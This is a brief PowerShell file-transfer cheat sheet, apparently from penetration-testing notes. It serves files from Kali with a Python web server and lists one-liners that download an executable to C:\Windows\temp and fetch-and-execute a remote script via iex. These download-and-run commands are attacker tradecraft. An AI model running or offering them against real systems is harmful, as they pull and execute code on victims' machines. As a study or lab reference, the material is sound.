Powershell

#share file from kali

Python -m SimpleHTTPServer 8000

#Download with Powershell

powershell.exe -command iwr -uri http:/10.0.0.1/file.exe -outfile C:\Windows\temp\file.exe

powershell -command iex (new-object net.webclient).downloadstring('http://server/file.ps1') -encodedcommand

Last updated